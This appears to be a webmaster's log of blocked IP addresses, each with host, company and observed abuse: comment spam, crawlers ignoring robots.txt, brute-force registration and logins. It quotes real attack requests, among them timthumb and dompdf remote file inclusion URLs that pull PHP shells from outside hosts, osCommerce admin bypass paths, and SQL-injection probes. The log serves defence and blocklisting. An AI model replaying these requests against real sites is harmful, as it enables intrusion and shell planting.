Company: United States – Bristow Microsoft Corp
Rule Breaker
Read robots.txt (bot dissalowed)
Then immediately looked for (non-existent) URL
199.30.20.16 Hostname: msnbot-199-30-20-16.search.msn.com
Company: United States – New Port Richey Microsoft Corp
Rule Breaker / bad bot
Read robots.txt (bot and .jpg dissalowed)
Then immediately crawled image folder looking for .jpg files
37.59.87.44 Company: France – Roubaix Ovh Systems Comment Spammer
Malicious User Agent detected:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
198.50.128.0 – 198.50.255.255 Company: Canada – Montreal Ovh Hosting Inc. Bad host: Ovh Hosting
198.50.215.62 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Hijacked browser detected: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
74.63.200.114 Hostname: 114-200-63-74.static.reverse.lstn.net
Company: Dallas Limestone Networks Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
67.159.8.162 Hostname: widethrone.quinninsurancequote.info
Company: United States – Chicago Fdcservers.net
Tried to register on restricted site
Listed Comment spammer
100.43.83.149 Hostname: spider-100-43-83-149.yandex.com
Company: Russian Federation – Moscow Yandex Inc
UA: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Rule Breaker – YandexBot/3.0
Rule breaker
Read robot.txt then tried to crawl the site
36.248.28.19 Company: China – Fuzhou Fuzhou City Fujian Provincial Network Of Unicom Brute force login/register attempt
/profile.php?mode=register&agreed=true&coppa=0
/index.php?act=Login&CODE=00
/ucp.php?mode=register
/registration_rules.asp?FID=0
/index.php?do=/user/register/
/index.php?page=en_Signup
/tools/quicklogin.one
/?page=login&cmd=register
/wp-login.php?action=register
/?s=Register
/index.php?app=core&module=global&section=login
/index.php?p=member/signup
/YaBB.cgi/
YaBB.pl/
/index.php/forums/member/register
/member/join.php
/join_form.phpHACKING ATTEMPT: URL//+encodeURIComponent(location.href)+
Project Honeypot listed comment spammer
36.248.0.0 – 36.248.63.255 Company: China – Fuzhou Fuzhou City Fujian Provincial Network Of Unicom Banned region: China
192.74.228.97 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
192.74.228.96 – 192.74.228.111 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Bad host
142.4.117.121 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
142.4.117.120 – 142.4.117.127 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Bad host
74.208.111.127 Hostname: s15357077.onlinehome-server.com
Company: United States – Wayne 1&1 Internet Inc.
Shared hosting server IP
Looking for vulnerability:
/connectors/lang.js.php
157.56.93.62 Hostname: msnbot-157-56-93-62.search.msn.com
Company: United States – Chicago Microsoft Corp
User Agents:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
msnbot-UDiscovery/2.0b (+http: //search.msn.com/msnbot.htm)
Bad search bad using bad lookup requests[URL]/%3Cscript%3E%20%20%20var%20_
ds_midx;%20%20%20if%20(!_ds_midx)%20{%20%20%20%20%20_ds_midx%20=%20
{%20%20%20%20%20%20%20accountId:%2041551,%20%20%20%20%20%20%20
searchSetupId:%2024%20%20%20%20%20};%20%20%20%20%20(function()%20
{%20%20%20%20%20%20%20var%20r%20=%20document.createElement(\’script\’);
%20%20%20%20%20%20%20var%20s%20=%20document.getElementsByTagName
(\’script\’)[0];%20%20%20%20%20%20%20r.async%20=%20true;%20%20%20%20%
20%20%20r.src%20=%20\’http: //****.*******
8.29.140.157 Hostname: 8-29-140-157.bhsrv.net
Company: United States – Cincinnati Beyond Hosting Llc
Looking for WordPress xmlrpc.php
199.30.20.27 Hostname: msnbot-157-56-93-62.search.msn.com
Company: United States – New Port Richey Microsoft Corp
User agent:
msnbot-media/1.1 (+http: //search.msn.com/msnbot.htm)
Rule Breaker
Read robots.txt then immediately crawled disallowed folder
(/wp-content/uploads/) and file extension (.jpg)
41.248.151.201 Company: Morocco – Rabat Adsl Maroc Telecom Comment Spammer
Bad host
64.120.11.251 Hostname: 64.120.11.251.rdns.ubiquityservers.com
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
trying to register on restricted site
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
192.74.236.169 Company: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Looking for indexes – index.php
Bad host
66.85.159.194 Company: United States – Phoenix Secured Servers Llc Trying to register on restricted site
108.170.18.49 Company: United States – Phoenix Secured Servers Llc Comment Spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
66.248.202.119 Company: United States – Dallas Hayden Dohert Comment Spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5;
Windows NT 5.0) Opera 7.02 Bork-edition [en]
83.139.189.31 Company: Russian Federation – Voronezh Ic-voronezh Trying to access /administrator/index.php
103.30.29.2 Company: Bangladesh – Chittagong Bbts Network Bad request:
URL/+\”trackback+from+your+own+site\”+gamer+mouse&ct=clnk
192.119.151.137 Company: United States – Dallas Hayden Dohert Malicious user agent detected: PHP/5.2.10
64.120.218.18 Hostname: 64-120-218-18.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Malicious user agent detected: PHP/5.2.10
87.101.240.8 Hostname: cache-kho3.itc.net.sa
Company: Saudi Arabia – Riyadh Integrated Telecom Co. Ltd
Comment spammer, spam harvester, mails server, dictionary attacker
Seen with malicious user agents incl:
libwww-perl/5.805
MJ12bot/v1.0.8 (http: //majestic12.co.uk/bot.php?+)
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
142.4.112.234 Company: United States – San Jose Vpsbus
PEGTECHINC – PEG TECH INC
Website server IP: 2 websites kvitosvit-semena.com.ua kvitosvit.com.ua
Comment spammer
Bad host
188.208.15.62 Company: Romania – Iasi Sc Rados Impex Srl Trying to register on restricted site
193.106.27.215 Company: Ukraine – Chernivtsi C.t.net Ltd Comment Spammer
198.50.215.17 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host: Ovh Hosting Inc.
89.47.29.198 Company: Company: Romania – Iasi Sc Eurocris Impex Srl Comment Spammer
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
192.95.57.170 Hostname: titan.genohost.com
Company: Canada – Montreal Ovh Hosting Inc.
Remote File Inclusion attempt / WordPress timthumb RFI exploit using very long requests:
(URL)/symi-fct01.html&sa=U&ei=eYS7UaTaLOHRyAHg1IC4Dg&ved=
0CEkQFjAPOKwC&usg=AFQjCNGItTTlFv90UyzTfogbMTQZV0g78g/wp-content/themes/
Growing-Feature/includes/thumb.php?src=http: //flickr.com.smsmesajlari.tk/xp.php/
wp-content/themes/Growing-Feature/includes/thumb.php?src=http:
//flickr.com.smsmesajlari.tk/xp.php
Bad host: Ovh Hosting Inc.
89.74.157.151 Hostname: 89-74-157-151.dynamic.chello.pl
Company: Poland – Warsaw Upc Polska Sp. Z O.o.
Trying to register on restricted site
/user/registerindex.php
197.253.6.97 Company: Nigeria – Lagos Mainone Cable Company Probably looking for known WordPress GD Star ratings vulnerabilty from old plugin version
/wp-content/plugins/wp-ui/css/css.php?styles=wpui-light%7Cwpui-blue%7Cwpui-red%7Cwpui-green%
7Cwpui-dark%7Cwpui-quark%7Cwpui-alma%7Cwpui-macish%7Cwpui-redmond%7Cwpui-sevin&ver=3.5.1
/wp-content/plugins/gd-star-rating/css/gdsr.css.php?o=off&s=a10i10m20k20c05r05%23121620243046%
23121620243240%23s1pchristmas%23s1pcrystal%23s1pdarkness%23s1poxygen%23s1goxygen_gif%
23s1pplain%23s1ppumpkin%23s1psoft%23s1pstarrating%23s1pstarscape%23t1pclassical%23t1pstarrating
%23t1gstarrating_gif%23lsgflower&t=1357456617&ver=1.9.22Known Dictionary attacker
89.201.178.150 Hostname: 89-201-178-150.dsl.optinet.hr
Company: Croatia – Zagreb Ot – Optima Telekom D.d.
Dictionary Attacker
Hotlinker
Trying to fake Google Search:
81.95.126.169 Hostname: hosted-by.fusa.be
Company: Belgium – Brugge Lcp Nv
Shared hosting server IP: 3 websites: kingslize.be kingslizepizza.be pizzalier.be
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
89.184.79.71 Hostname: en390.mirohost.net
Company: Ukraine – Kiev Internet Invest Ltd.
Shared hosting server IP: 9 website
Remote File Inclusion attempt / WordPress timthumb RFI exploit
wp-content/themes/backstage/tools/timthumb.php?src=http: //flickr.com.rmacomputacion.com.ar/bad.php
87.244.152.77 Hostname: 77-152-244-87.sat.poltava.ua
Company: Ukraine – Kiev Satellite Ltd
Trying to access non-existent wp-login
67.228.95.2 Hostname: 67.228.95.2-static.reverse.softlayer.com
Company: United States – San Jose Softlayer Technologies Inc.
Remote File Inclusion attempt / WordPress timthumb RFI exploit using very long requests
/rss.xml” onclick=”javascript:_gaq.push([‘_trackEvent’,’outbound-widget’,’****’]);” target=
“_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px; margin-right: 6px; margin-top:
0px; margin-bottom: 0px;” src=”****”alt=”” width=”16″ height=”16″ />*****</a><br />
<a href=”*****” target=”_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px;
margin-right: 6px; margin-top: 0px; margin-bottom: 0px;” src=”*******” alt=””
width=”16″ height=”16″ />*****</a><br /><a href=”******/feed/” onclick=”javascript:_gaq.push
([‘_trackEvent’,’outbound-widget’,’*******’]);” target=”_blank” rel=”nofollow”><img style=
“float: left; margin-left: 6px; margin-right:6px;” src=”****” alt=”” width=”16″ height=”16″ />
****</a><br /><a href=”*****” target=”_blank” rel=”nofollow”><img style=”float: left; margin-left:
6px; margin-right: 6px;” src=http: //picasa.com.amandas-designs.com/eva.php
Seen with malicious user agent libwww-perl/6.04
and fake user agent: Mozilla/5.0 (compatible; Googlebot/2.1; http: //www.google.com/bot.html)
64.207.188.178 Hostname: jjvt-zz2w.accessdomain.com
Company: United States – Culver City Media Temple Inc.
Shared hosting server IP: 8 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit using very long requests
/rss.xml” onclick=”javascript:_gaq.push([‘_trackEvent’,’outbound-widget’,’****’]);” target=”
_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px; margin-right: 6px; margin-top: 0px;
margin-bottom: 0px;” src=”****” alt=”” width=”16″ height=”16″ />*****</a><br />
<a href=”*****”target=”_blank” rel=”nofollow”><img style=”float: left; margin-left: 6px;
margin-right: 6px; margin-top: 0px; margin-bottom: 0px;” src=”*******” alt=”” width=”16″
height=”16″ />*****</a><br /><a href=”******/feed/” onclick=”javascript:_gaq.push
([‘_trackEvent’,’outbound-widget’,’*******’]);” target=”_blank” rel=”nofollow”>
<img style=”float: left; margin-left: 6px; margin-right: 6px;” src=”****” alt=”” width=”16″
height=”16″ />****</a><br /><a href=”*****” target=”_blank” rel=”nofollow”>
<img style=”float: left; margin-left: 6px; margin-right: 6px;” src=http:
//picasa.com.amandas-designs.com/eva.php
Bad host: Culver City Media Temple Inc.
85.214.23.182 Hostname: h654956.serverkompetenz.net
Company: Germany – Berlin Strato Ag
Website server IP: website -mydesigna.info
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.239.232.108 Hostname: 91.239.232.106.hostpro.com.ua
Company: Ukraine – Kiev Hostpro Ltd.
Website server IP: 2 websites kvitosvit-semena.com.ua kvitosvit.com.ua
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.239.232.106 Hostname: 91.239.232.108.hostpro.com.ua
Company: Ukraine – Kiev Hostpro Ltd.
Website server IP: 1 website nday.te.ua
Comment Spammer
157.55.32.76 Hostname: msnbot-157-55-32-76.search.msn.com
Company: United States – Redmond Microsoft Corp
Rule Breaker
Crawling robots.txt disallowed folders, and URLs
/trackback/
/feed/
I am now banning all spiders from Bing and MSN search until they get their bots to behave
151.237.190.172 Company: Sweden – Stockholm Deepak Mehta Fie Comment Spammer / Trackback Spammer
Bad Host: Deepak Mehta Fie
Malicious user agent detected: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
179.252.28.85 Company: Brazil – Brasilia Brasil Telecom S/a – Filial Distrito Federal Tried to login to WordPress admin
193.107.72.167 Hostname: host167.net-city.net
Company: Ukraine – Smila Fop Osaula Mihail Dmitrovich
Brute force login / dictionary attack
/user/login/index.php
65.55.52.117 Hostname: msnbot-65-55-52-117.search.msn.com
Company: United States – New York City Microsoft Corp
User agent:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)”>Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Trying to get property of non-object in aggregator_page_rss()
(line 390 of /home/******i/public_html/modules/aggregator/aggregator.pages.inc)
Rule breaker – ignored robot’s.txt and crawled site
bingbot/2.0 is disallowed in robots.txt
All Bing / MSN bots are banned from my sites
85.131.246.130 Hostname: mail.link11.de
Company: Germany – Frankfurt Am Main Link11 Gmbh
Malicious user agent: libwww-perl/5.836
204.14.79.144 Company: United States – Tea Areti Internet Llc Comment Spammer
Mail server
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
81.216.60.250 Company: Sweden – Sollentuna Borenet Ab Looking for vulnerable JavaScripts
Several requests detected
93.186.180.251 Hostname: jaggledell.oxilion.nl
Company: Netherlands – Enschede Oxilion B.v.
Shared hosting server IP: 5 websites
Suspected attemt to exploit WordPress JSDeliver plugin:
/jsdelivr-wordpress-cdn-plugin-review/e107
/e107
/jsdelivr-wordpress-cdn-plugin-review/&sa=U&ei=gva2UdukIqariAKpvYC4BA&ved=0CH0QFjAe&usg=AFQjCNEfu69NoF9E0hCNQygRhbG1vHMtvQ/e107
5.135.11.115 Company: France – Roubaix Ovh Systems Trackback spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
151.237.190.176 Company: Sweden Stockholm – Deepak Mehta Fie Trackback spammer
Hijacked Browser – User agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
190.152.171.152 Company: Ecuador – Guayaquil Corporacion Nacional De Telecomunicaciones – Cnt Ep Trying to access wp-admin.php and wp-login.php
181.112.185.102 Company: Ecuador – Guayaquil Corporacion Nacional De Telecomunicaciones – Cnt Ep Trying to access wp-admin.php and wp-login.php
Known Dictionary attacker
142.4.214.32 Hostname: ns4004303.ip-142-4-214.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
91.200.14.5 Company: Ukraine – Lenina Pp Sks-lugan Comment Spammer
94.23.92.186 Hostname: 94-23-92-186.kimsufi.com
Company: France – Roubaix Ovh Systems
Trying to register
/registerindex.php
216.22.48.102 Hostname: vps.bbspot.com
Company: United States – Mclean Smv
Shared hosting server IP: 18 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/widescreen/includes/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinformatica.com%2Fbad.php
88.86.111.225 Hostname: strike2.digitalniservis.cz
Company: Czech Republic – Prague Supernetwork S.r.o.
Shared hosting server IP: 51 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.119.148.184 Company: United States – Dallas Jason Cross Seen with malicious user agent: PHP/5.2.10
37.59.64.10 Company: France – Roubaix Ovh Systems Trackback Spammer
188.165.151.170 Company: United Kingdom – London Ovh Systems Trackback spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
87.151.171.227 Hostname: p5797ABE3.dip0.t-ipconnect.de
Company: Germany – Berlin Deutsche Telekom Ag
Mail Server
Trying to load non-existent css files directly
{FOLDER}/files/css/css_alhdwgr_1c9bu6d-gsnrwf7jkbs_kvwdvli98atiij4.css
{FOLDER}/files/css/css_pbm0lsqqj7a7wccimgxlho6mi_kbngznnuwmtwcnfoe.css
94.27.81.217 Hostname: SOL-FTTB.217.81.27.94.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
194.8.30.66 Hostname: web2.host-services.com
Company: Portugal – Faro Flesk Lda
Shared hosting server IP: 594 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.46.138.69 Hostname: host.colocrossing.com
Company: United States – Kingston Hudson Valley Host
Comment Spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
37.59.219.121 Company: France – Roubaix Ovh Systems Comment Spammer
64.207.145.168 Hostname: vps.webedgedesign.com
Company: United States – New York City Media Temple Inc.
Website server IP: website – trendnation.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.64.8.16 Company: Canada – Montreal Synaptica Comment Spammer
Trackback Spammer
91.244.149.252 Company: Ukraine – Pervomays’k Pp Sks-pervomaysk Looking for exploit vulnerability
/engine/engine.php
95.9.186.85 Hostname: 95.9.186.85.static.ttnet.com.tr
Company: Turkey – Etimesgut Turk Telekomunikasyon Anonim Sirketi
Comment Spammer
95.132.5.223 Hostname: 223-5-132-95.pool.ukrtel.net
Company: Ukraine – Kiev Jsc Ukrtelecom
Comment Spammer
173.212.192.169 Company: United States – Chandler Dme Hosting Llc Comment Spammer
188.165.166.54 Company: France – Roubaix Ovh Systems Trackback spammer
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
142.4.117.81 Company: United States – San Jose Ji Tesi Comment Spammer
66.248.193.209 Company: United States – San Jose Ji Tesi Bot trying to register on restricted site
188.138.124.56 Hostname: loft8055.serverloft.com
Company: Germany – Hurth Intergenia Ag
Shared hosting server IP: 150 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
(URL}&amp;sa=U&amp;ei=OtezUd24AumJ7Ab8uYCYBg&amp;ved=0CFcQFjAUOKwC&amp;usg=AFQjCNE9ghhZjiyQZkEhJZGKEYaPEKKZFQ/admin/banner_manager.php/login.php
{URL}&amp;sa=U&amp;ei=OdezUaOJL6ey7AbdrICgDA&amp;ved=0CFcQFjAUOKwC&amp;
usg=AFQjCNGC3m73wvkYTNv-Oyv0_hquxwXuUQ/admin/file_manager.php/login.php
{URL}&amp;sa=U&amp;ei=OtezUaH8B8TE7AaKlYEg&amp;ved=0CFcQFjAUOKwC&amp;usg=AFQjCNFPeBaX5TBwmhaaV40SoDgE56VxMQ/admin/categories.php/login.php
207.58.134.164 Hostname: vps.webedgedesign.com
Company: United States – New York City Smv
Website server IP: website – bigplay.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.245.49.72 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host: Ovh Hosting Inc.
199.180.119.202 Company: United States – Scranton Volumedrive
Website server IP:
Comment Spammer
91.121.216.191 Company: France – Roubaix Ovh Systems Comment Spammer
Bad host: Roubaix Ovh Systems.
88.190.40.138 Company: France – Roubaix Ovh Systems Comment Spammer
Bad host: Roubaix Ovh Systems.
89.221.250.9 Hostname: www9.aname.net
Company: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting server IP: 731 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
209.140.19.57 Hostname: vps.datanic.cl
Company: United States – Fulshear Landis Holdings Inc
Shared hosting server IP: 40 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/the_dark_os/tools/timthumb.php?src=http: //flickr.com.kforkent.com/cpx.php
/wp-content/themes/the_dark_os/tools/timthumb.php?src=http: //flickr.com.kforkent.com/shellx.php
91.243.165.49 Company: Iran, Islamic Republic – Of Tehran Sari System Bandarabas Company Trackback Spammer
188.143.233.173 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment Spammer
142.4.212.103 Hostname: ns4003924.ip-142-4-212.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
Bad host
94.19.191.183 Hostname:94.19.191.183.pool.sknt.ru
Company: Russian Federation – Saint Petersburg Skynet Ltd.
Comment Spammer
100.42.213.40 Hostname: 100-42-213-40.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment spammer
Looking for wp-content/uploads/index.php
37.247.122.177 Hostname: dns2.avantigrup.net
Company: Spain – Madrid Estrategias Website S.l.
Shared hosting server IP: 45 websites
Looking for exploit vulnerability
DOMAIN/is-human/
103.9.101.161 Hostname: sg161.singhost.net
Company: Singapore – Singapore Vodien Internet Solutions Pte Ltd
Shared hosting server IP: 545 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Variations of these with long requests e.g.
/&amp;sa=U&amp;ei=Ybi5UcLVEeit0QWfs4H4DQ&amp;ved=0CCAQFjAA&amp;usg=
AFQjCNENW0XAAbiWt2IAIBCbagnZDcBd_A/admin/banner_manager.php/login.php
85.204.251.238 Company: Romania – Pitesti Krogertek Srl Comment spammer
192.74.228.177 Company: United States – San Jose Ji Tesi Comment spammr
89.21.94.200 Company: Ukraine – Zaporizhzhya Tov Bf Express Ltd Brute force / DOS hacking attack
Looked for:
/includes/admin_board2.php?phpbb_root_path=1’+–+?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=1’+–+?
/rurl=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK
/includes/functions.inc.php?sitepath=1’+–+
plus over 200 other attempts
Attack continued for 6 minutes
65.55.24.243 Hostname: msnbot-65-55-24-243.search.msn.com
Company: United States – Redmond Microsoft Corp
User agentBing Bot – User Agent:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Rule breaker:
Ignores robots.txt
Specific violation: Disallow .html.-
Crawled URL/.html.-
Crawled non-existent URLs
184.168.116.128 Hostname: ip-184-168-116-128.ip.secureserver.net
Company: United States – Scottsdale Godaddy.com Llc
Shared hosting server IP: 9 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
199.71.214.71 Hostname: mail09.tccls.com
Company: United States – Union City Psychz Networks
Trying to register on restricted site
Banned User Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
69.197.189.13 Company: United States – Kansas City Wholesale Internet Inc. Brute force attempt to register on restricted site
/member.php?mod=register
/reg.asp
/index.asp?T=reg
/CreateUser.asp
//register.aspx?agree=yes
/index.php?action=registernew
/index.php?app=core&module=global§ion=register
/index.php?CODE=00&act=Reg
/index.php?do=/user/register/
/login.php?action=person&part=register
/index_do.php?dopost=regnew&fmdo=user
/reg.asp?reg=reg
Bot hit site about 80 times in 90 seconds
46.229.164.97 Company: Netherlands – Amsterdam Haldex Ltd Unwanted bot: SemrushBo
User agent ID: Mozilla/5.0 (compatible; SemrushBot/0.95; +http: //www.semrush.com/bot.html)
202.46.63.91 Company: China Shenzhen – Shenzhen Sunrise Technology Co. Ltd. Banned Bot: Baiduspider
Uaser Agent ID: Mozilla/5.0 (compatible; Baiduspider/2.0; +http: //www.baidu.com/search/spider.html)
100.43.83.158 Company: Russian Federation – Moscow Yandex Inc Banned Bot: YandexBot
User Agent ID: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
61.38.186.221 Company: Korea, Republic Of – Seoul Dacom Corp. Comment Spammer
94.73.156.146 Hostname: 94-73-156-146.cizgi.net.tr
Company: Turkey – Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi
RFI attack on dompdf.php (Doesn’t exist on site)
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/list.php??URL&amp;sa=U&amp;ei=
sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=
AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/kenx.php??
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/kan.php??
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/kun.php??
URL&amp;sa=U&amp;ei=sDuvUZylCoHZrgGHl4BA&amp;ved=0CNUBEBYwOA&amp;usg=AFQjCNHzft7oVAAk6swCmA0FOgyPWNq51Q//dompdf.php?input_file=http:
//www.eriicta.am/ccs/zyty/my/is/rf/flow.php??Each attempt followed by:
//dompdf.php?input_file=test??
94.73.156.144-94.73.156.151 Company: Turkey – Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi Turkey
Bad host
188.92.75.244 Company: Latvia – Riga Ad Technology Sia Comment Spammer
188.92.75.0 – 188.92.75.255 Company: Latvia – Riga Ad Technology Sia Banned region: Latvia
70.86.19.242 Hostname: server1.andisites.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP: 87 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
88.233.215.231 Hostname: 88.233.215.231.dynamic.ttnet.com.tr
Company: Turkey -Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force dictionary attack on site admin with user name admin
over 100 hits in 2 minutes
/user/
/bitrix/admin/index.php?lang=en
/admin/
88.233.0.0 – 88.233.255.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host: Ankara Turk Telekomunikasyon Anonim Sirketi
37.59.189.227 Company: France – Roubaix Ovh Systems Comment spammer
Bad host
142.4.112.225 Company: France – San Jose Jiusutechnology Limited Liability Company
PEG TECH INC
Comment spammer
Bad host
142.4.112.224 – 142.4.112.231 Company: France – San Jose Jiusutechnology Limited Liability Company
PEG TECH INC
Bad Host: PEG TECH INC
66.235.180.47 Company: United States – Rio Linda Hopone Internet Corporation
Website server IP: 3 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/widescreen/includes/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinformatica.com%2Fbad.php
84.54.160.228 Hostname: 88.233.215.231.dynamic.ttnet.com.tr
Company: Bulgaria – Sofia Comnet Bulgaria Holding Ltd.
Tried to access /wp-signup
Bad host
84.54.160.0 – 84.54.175.255 Company: Bulgaria – Sofia Comnet Bulgaria Holding Ltd. Restricted Region: Bulgaria
Bad host: Sofia Comnet Bulgaria Holding Ltd.
Multiple IPs in their range listed as spammers and dictionary attackers
89.28.101.245 Hostname: 89-28-101-245.starnet.md
Company: Moldova, Republic Of – Chisinau Starnet S.r.l
Comment spammer
190.14.225.106 Hostname: 19014225106.ip2.static.mediacommerce.com.co
Company: Colombia – Pereira Media Commerce Partners S.a
Comment spammer
159.253.130.4 Hostname: shop.server-038.com
Company: United Kingdom – London Softlayer Dutch Holdings Bv
Shared hosting server IP: 615 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
&amp;sa=U&amp;ei=e5uwUaD-NrHAiwKmgYHoCQ&amp;ved=0CB4QFjAB&amp;usg=
AFQjCNFgETfScJ9MWSB1am2o6bSA8QSJKA/wp-content/plugins/lightbox-plus/tools/
timthumb.php?src=http: //flickr.com.smsmesajlari.tk
/wp-content/plugins/lightbox-plus/tools/timthumb.php?src=http: //flickr.com.smsmesajlari.tk/xp.php
94.68.110.48 Hostname: ppp-94-68-110-48.home.otenet.gr
